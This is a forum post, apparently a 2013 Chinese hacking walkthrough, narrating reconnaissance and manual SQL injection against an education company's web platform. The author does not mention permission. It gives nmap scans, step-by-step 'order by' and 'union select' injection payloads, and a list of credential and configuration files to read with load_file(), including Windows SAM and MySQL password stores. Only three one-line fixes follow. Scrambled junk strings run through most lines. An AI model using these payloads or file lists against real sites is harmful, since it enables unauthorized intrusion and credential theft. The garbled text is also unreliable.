找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2230|回复: 0
打印 上一主题 下一主题

记一次Linux系统PHP注入入侵检测

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 22:23:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
题记:0 ]9 B( n; {: W( z  b$ d
一位朋友在某教育公司,一套网络教育平台。一年前,在2008年8月份的时候,我看到了这套平台,当时发现了个注入漏洞,测试了一下,得到一个可用帐户后就没有再继续下去。今天7月,又说到此事,我决定继续下去……
3 F- y# h) Z* S9 \- F第一步:获取需要的信息( W% J: Q$ `2 Q4 W9 _9 e# i
由于之前测试过,知道此系统某处存在SQL注入漏洞。但由于时隔一年,岁月的远去已经深深的隐藏了那个SQL注入漏洞的地址,现在需要重新收集服务器有用信息。
- O( t& D; B" P# O4 O注:以下为保护特用XXX代替敏感信息9 M$ K# J+ U$ x
顺手先PING了一下他们的域名:6 \/ B3 l  E4 _: s5 @, [+ D
ping XXX.XXX.XXX.XXX(本文约定:用XXX.XXX.XXX.XXX代表测试IP和域名)
! d: B8 b5 F+ ?64 bytes from *********: icmp_seq=1 ttl=246 time=1.87 ms/ X& ^5 T2 U- }2 a' M& g
顺便了解一下TTL,学好基础知识才能一路顺风:
2 y) O2 I7 M: u* S* U) W5 d1 m% ?TTL:(Time To Live ) 生存时间
. ^9 j& M% h9 [$ U指定数据包被路由器丢弃之前允许通过的网段数量。
& c" u& c* e) X) yTTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器至少将 TTL 减小 1。4 Q/ M6 c8 K/ n5 {/ p. g
使用PING时涉及到的 ICMP 报文类型% L; a. x2 X' s& k( G
一个为ICMP请求回显(ICMP Echo Request). v. J# J( {9 D8 l. G# M
一个为ICMP回显应答(ICMP Echo Reply)1 I7 T6 H4 b2 ^9 G
TTL 字段值可以帮助我们识别操作系统类型。4 W! |4 |7 J" T* A2 u& v
UNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 2556 c9 [6 Z3 G" ]* X% B+ ?* d
Compaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64
% Z8 Q. l  Q; p. f+ }微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128# Q( H5 N7 |; O: s0 L1 ~! t) D2 T
微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 32# r' o8 Y4 Y9 R& \. U. G( E
当然,返回的TTL值是相同的
- i# G  x% o' e3 f7 E但有些情况下有所特殊: y8 p* {% l/ z
LINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 64
2 u, @# d) d4 A7 o& w/ m4 @$ G( K- NFreeBSD 4.1, 4.0, 3.4;
$ b% i. p. d) e4 J6 U3 ASun Solaris 2.5.1, 2.6, 2.7, 2.8;
4 j3 D6 G) i# m8 HOpenBSD 2.6, 2.7,  V: x  t! v, y' b, ], I8 Q
NetBSD
5 ]) U3 |3 V: P: pHP UX 10.205 m' s! Z/ U1 W0 M$ K2 _: S5 |
ICMP 回显应答的 TTL 字段值为 255& I4 u. y% B; \0 K) C
Windows 95/98/98SE
% j8 p1 U! C; YWindows ME
, _% _( E/ f5 B7 A( b: _ICMP 回显应答的 TTL 字段值为 32, [* z6 i3 @2 S6 m% }
Windows NT4 WRKS" s  L" k) W+ z: b' R, b. T
Windows NT4 Server3 z  ?" G; d7 F  K# s
Windows 2000
! e$ ~8 f2 Z0 B. Y$ ZWindows XP
9 _0 E6 Q0 ?, D, P, eICMP 回显应答的 TTL 字段值为 128
- E) z, w+ C) h9 Z这样,我们就可以通过这种方法来辨别操作系统
) v# r7 C1 L5 t' B0 B- t) c" hTTL值的注册表位置HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值,其数据就是默认的TTL值了,我们可以修改,但不能大于十进制的255
5 }5 r( ~: ~- U/ G# `1 M用NMAP扫描一下:
5 \6 w- N3 k+ g8 [& }- P" Gnmap -sT -O XXX.XXX.XXX.XXX; t5 g& y% {, `# i' I
如果没有装WinPcap则会弹出提示:$ Y- N2 ^7 H9 h( X
WARNING: Could not import all necessary WinPcap functions.  You may need to upgr
2 P- t7 [1 x" u7 Vade to version 3.1 or higher from http://www.winpcap.org.  Resorting to connect(
9 b/ L3 u  t! B) mode — Nmap may not function completely! ~, v! M1 \3 c
TCP/IP fingerprinting (for OS scan) requires that WinPcap version 3.1 or higher! K) Q9 ?9 w9 B
and iphlpapi.dll be installed. You seem to be missing one or both of these.  Win
, i+ A% s* S0 P# B$ Ypcap is available from http://www.winpcap.org.  iphlpapi.dll comes with Win98 an
7 a* V4 [6 ?% i" qd later operating sytems and NT 4.0 with SP4 or greater.  For previous windows v
' K* s; r, p* e: i: Qersions, you may be able to take iphlpapi.dll from another system and place it i' ]# d8 U. }! H3 j  X
n your system32 dir (e.g. c:\windows\system32).
$ D; ?! ?0 m5 L4 l; H8 o2 NQUITTING!  O. Y8 }0 Y- f+ z+ A
到这里下载: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe+ M3 D2 [4 r6 F5 M  _; @
安装后继续执行刚才的命令,等待扫描完毕后得到入下信息:* Q' B* s" F" x
Interesting ports on XXX.XXX.XXX.XXX:
5 ]7 n2 [% |  l  M% \+ ~Not shown: 986 closed ports
9 g$ Y# W+ X7 fPORT     STATE    SERVICE  o( n% ^) Z9 ~2 j8 r; w* ?6 r# I
21/tcp   open     ftp
  Y9 G9 `, t$ K+ u4 N22/tcp   open     ssh
4 }% v) k/ O2 |* G: Q8 y/ ]23/tcp   open     telnet
5 s: C, X, Q* |; u: W80/tcp   open     http+ y  C8 k6 L3 ^( r  T
111/tcp  open     rpcbind- F) }$ E1 a7 }% U6 G0 M5 s% R( ^' I
135/tcp  filtered msrpc8 b6 S3 B- n( s" @. F& e2 ^5 h
139/tcp  filtered netbios-ssn8 ]9 O& ]  p: ^
445/tcp  filtered microsoft-ds& Y* Y' X  a  c) q$ W- S
513/tcp  open     login
' e9 ^! g7 v: d+ p; ?514/tcp  open     shell+ J# U1 z# H# ~& a. Q6 T" g
593/tcp  filtered http-rpc-epmap
# ?8 W* T3 _$ o* R# z1720/tcp filtered H.323/Q.9314 v) Z$ X3 u. e2 |
3306/tcp open     mysql0 u0 b; v; ~# u; X7 U, r
4444/tcp filtered krb524% X3 ?5 H( ?! Y$ s1 H
Device type: WAP
- n+ T$ }3 w8 }$ P6 F0 K) ^/ v* LRunning: Linux 2.4.X7 Y! [. u1 B& D" a: D. n
OS details: DD-WRT (Linux 2.4.35s)6 q1 w3 q: q0 C6 F( U
Network Distance: 13 hops( \5 v- E( P1 V8 V
看到SSH22端口是开着的,打开putty试一下,看是否可以正常连接:
" ~7 I6 E4 i" E( v' Glogin as:$ h$ A# y  p/ K" ?
Telnet23端口也是开着的,用telnet 命令链接一下:* \  d# ]( {/ W( X
telnet XXX.XXX.XXX.XXX7 J8 R  R$ B, k* D
提示:
9 ?. j& T9 v- cRed Hat Enterprise Linux Server release 5.2 (Tikanga)* l7 [9 x. Y! U( ~
Kernel 2.6.18-92.el5PAE on an i686
8 a5 d7 |8 W" \" Y" b# Y# `( x- Ulogin:- X- O0 p& D  U6 u7 r/ c
获取HTTP头信息:
+ _3 R3 W+ N( h3 S. j; f. r" R, t  Y9 z在本地执行如下PHP代码
: [" D! z5 }" K. j- ^<?php1 t7 L2 b" L3 d7 _0 C* }* T( c
$url = ‘XXX.XXX.XXX.XXX’;  s3 x+ @- J% V% d9 J: g) g& T
print_r(get_headers($url));
& |* b! E5 A( N3 q5 l4 R, n9 D" Kprint_r(get_headers($url, 1));' h( x, b  ~9 K7 \+ |
?>0 F1 f& K+ D" X& e& `
将以上代码保存为PHP文件,执行:2 ^' U4 {( v1 l
Array ( [0] => HTTP/1.1 200 OK [1] => Server: nginx/0.7.61 [2] => Date: Mon, 02 Nov 2009 09:06:48 GMT [3] => Content-Type: text/html; charset=gb2312,gbk,utf-8 [4] => Content-Length: 75 [5] => Last-Modified: Thu, 20 Aug 2009 19:35:37 GMT [6] => Connection: close [7] => Accept-Ranges: bytes ) Array ( [0] => HTTP/1.1 200 OK [Server] => nginx/0.7.61 [Date] => Mon, 02 Nov 2009 09:06:48 GMT [Content-Type] => text/html; charset=gb2312,gbk,utf-8 [Content-Length] => 75 [Last-Modified] => Thu, 20 Aug 2009 19:35:37 GMT [Connection] => close [Accept-Ranges] => bytes )
' I" s% S9 R% e现在可以得出结论:
3 S, a% L, t5 K7 d0 I系统版本:Red Hat Enterprise Linux Server release 5.2 (Tikanga)
# ^/ \! L4 @* F. k2 m0 P( @' N内核版本:Kernel 2.6.18-92.el5PAE on an i686
  K5 E$ ]- o' Z1 f6 S% R0 vWEB服务器版本:nginx/0.7.61: B) t3 x3 s- k2 }; ^
第二步,开始测试寻找漏洞
, z# M" h5 P) B5 s! X+ {分析是否存在注入漏洞,因为上次曾发现存在过,所以注入则是我们的首选。
; C* ]5 T' r. M1、敏感地址:站内存在有类似:http://www.fovweb.com/XXX.php?id=123 这种地址,属动态传参的% \8 |& U  Z  G+ W8 T3 n* a0 _
2、测试方法:在地址后加 and 1=1 和 and 1=2 测试2 H6 P' ]9 Q  m+ J3 W6 u2 S
http://www.fovweb.com/XXX.php?id=123 and 1=1 返回正常
. \/ C. d' M! E8 ~# Phttp://www.fovweb.com/XXX.php?id=123 and 1=2 返回错误, A2 l6 C5 H9 {5 P, Y7 ^) a
恭喜,两次返回结果不同,则很有可能存在未过滤敏感字符而存在SQL注入漏洞,我们继续
7 K% |/ r# ?& X& e$ u3、手工注入:- T3 L9 `* r2 J/ i
注入也应该有个思路,不能随便碰运气,要记住入侵检测不是靠运气而走下去的,要靠的是清晰的思路、过硬的技术、很全的知识面。
$ o/ ], r" w6 t/ c$ l. f* n3.1 猜测当前表字段数
* J: G0 d& W$ h* G1 m( uhttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 10) r7 v; {; s. F9 S" j
此处猜测有个简单的算法,都是有技巧的吗,呵呵
2 s- O+ X; e9 g1 u0 n4 ?" b算法简单如下:
7 X6 |0 @2 `- z) Y, @& q8 h* M第一步:根据页面信息,大概估算一个数值,这个是要靠一定的经验了;' m* ^+ j6 l+ h! [4 k! R
第二步:取中算法,好比是10,如果返回错误,则取中间值5进行下一次猜测;7 ^0 H/ x$ Z4 v' q: s
需要注意:如果所选数值在字段数范围内即小于等于,则会(返回正常);如果所选数值在字段范围外即大于等于,则会(返回错误)。
  l5 a  N1 M) x$ G, B以此来判断,是否过界,配合取中算法猜出字段数。
- q- P* R0 ^- U1 l举例:0 T! i' D8 Z! n9 d# y
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 3 返回正常
1 k$ G2 Y3 S' n; F$ p0 A' S% |1 whttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 4 返回错误
" G5 `6 V4 ?; G7 G) u此时3则为我们要找的字段数。
9 d: L! E# ]0 d* ^1 ]9 [3.2 配合union联合查询字段在页面所位置
5 ^# X$ ?* G% p( k我们已经知道了字段数为3,此时则可以做如下操作:
3 e7 R0 q6 h$ khttp://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,2,3
& i5 r' d7 T5 I2 o% i
! k! |2 J* U9 k% ?; ?7 E1 R9 B这样就可以测试到哪些字段在页面上有所显示了,如图:
# x9 ~; p1 r" ~& c
/ v  k4 N9 r+ Z' m3.3 查敏感信息
% T; |# m$ F- C- k这也是个思路问题,我们需要什么,其实到了这一步已经能做什么多事情了。
4 Z) m) t+ [  }5 W' q( R6 Dhttp://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,user(),database()  J5 z5 j9 U8 n: E7 ?
3.3.1 先查数据库用户、数据库名,以备后用,如图:
9 F6 I( T' ~, I; ], o6 j9 B$ F) F- v
得到数据库用户为root、数据库名为DBxx;
3 A2 _- b4 j: O( L" q0 m7 Z3.3.2 查配置文件6 C1 w; r8 O  {' {: r6 e  _
查配置文件,就是指查看系统敏感的文件,如web服务器配置文件等。
/ S% z+ R3 l3 L# x/ n0 `! b查看文件有一定的条件限制:
) E5 u6 k) a0 h8 z! `5 \1 T. Z欲读取文件必须在服务器上
: H0 [5 Z7 X0 d) Y8 M9 t必须指定文件完整的路径2 ^$ E! b5 G& n' z
必须有权限读取并且文件必须完全可读
" h/ i8 A2 w  N' `2 y0 D欲读取文件必须小于 max_allowed_packet8 P' b" J. ?! ~$ Z) e& [3 M! x
MYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件。& l$ B. e0 P$ ]$ N: T! ?
常用的一些:5 Y9 j4 _3 U: ]" F4 o
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
, v1 @4 l! w( I/usr/local/apache2/conf/httpd.conf
/ B. ^; ~) I+ f' `2 L* d/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置3 R# @6 a: G2 l$ o& l
/usr/local/app/php5/lib/php.ini //PHP相关设置
. ~- m+ I, f/ _8 C" y' e4 E6 g" b/etc/sysconfig/iptables //从中得到防火墙规则策略2 D. L) A5 b, J3 T
/etc/httpd/conf/httpd.conf // apache配置文件
" c/ Y! Q- S( i0 M1 o3 d/etc/rsyncd.conf //同步程序配置文件1 N) X8 {( ^- Y( W; b
/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.* ]' j$ r8 X3 a  k' y! Y
/etc/my.cnf //mysql的配置文件& {: Q4 }9 R0 W) R& d+ }/ S# A
/etc/redhat-release //系统版本
! j3 ?/ t& E  V. ^" a! Y; I/ j/etc/issue
* \" k& {1 x5 `! E# [/etc/issue.net
9 u6 c6 F' q& S. hc:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码
* y: {$ {8 a) b+ ^5 x2 ic:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码
" n; c  o) v0 o" ?c:\Program Files\Serv-U\ServUDaemon.ini
, P4 Z. i9 d# U  d. ]" q) Xc:\windows\my.ini //MYSQL配置文件+ k/ H: D8 ~! J5 Z. {
c:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件
8 r; w' }4 h- T3 I等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件,
2 A0 d% s% L8 S1 b" Dc:\windows\repair\sam //存储了WINDOWS系统初次安装的密码
% Y$ b5 b0 l5 p; I4 a0 Sc:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此
, i. P! O4 F  |; M; J2 j9 rc:\Program Files\RhinoSoft.com\ServUDaemon.exe, g2 D4 e0 E4 Q3 a( J% u7 x$ |) k  @
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
7 W+ A; J1 P' [+ G# G//存储了pcAnywhere的登陆密码2 Q3 q0 ?+ A1 |# {/ g
由于之前得到信息,此台服务器是采用的nginx做的Web服务器,那我们就来试着找一下nginx的安装路径吧。
" E+ g' N) q+ v  s0 M% I这个没有技术性可言,纯靠经验和运气,由于很少用nginx不了解,我就先到网上搜索常用的安装路径,以及比较好的配置文档中的安装路径进行测试,最终,得到nginx安装路径“/usr/local/nginx/conf/nginx.conf”。
" o7 V1 g3 `1 |最后:防范措施
+ A$ T) X8 I) q2 M$ O1 w1、修复PHP注入漏洞;8 j% W; U! p# z: y6 C4 L
2、Mysql使用普通权限的用户;& k& F0 E  Y2 h7 K. U
3、升级linux内核至最新版本;
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表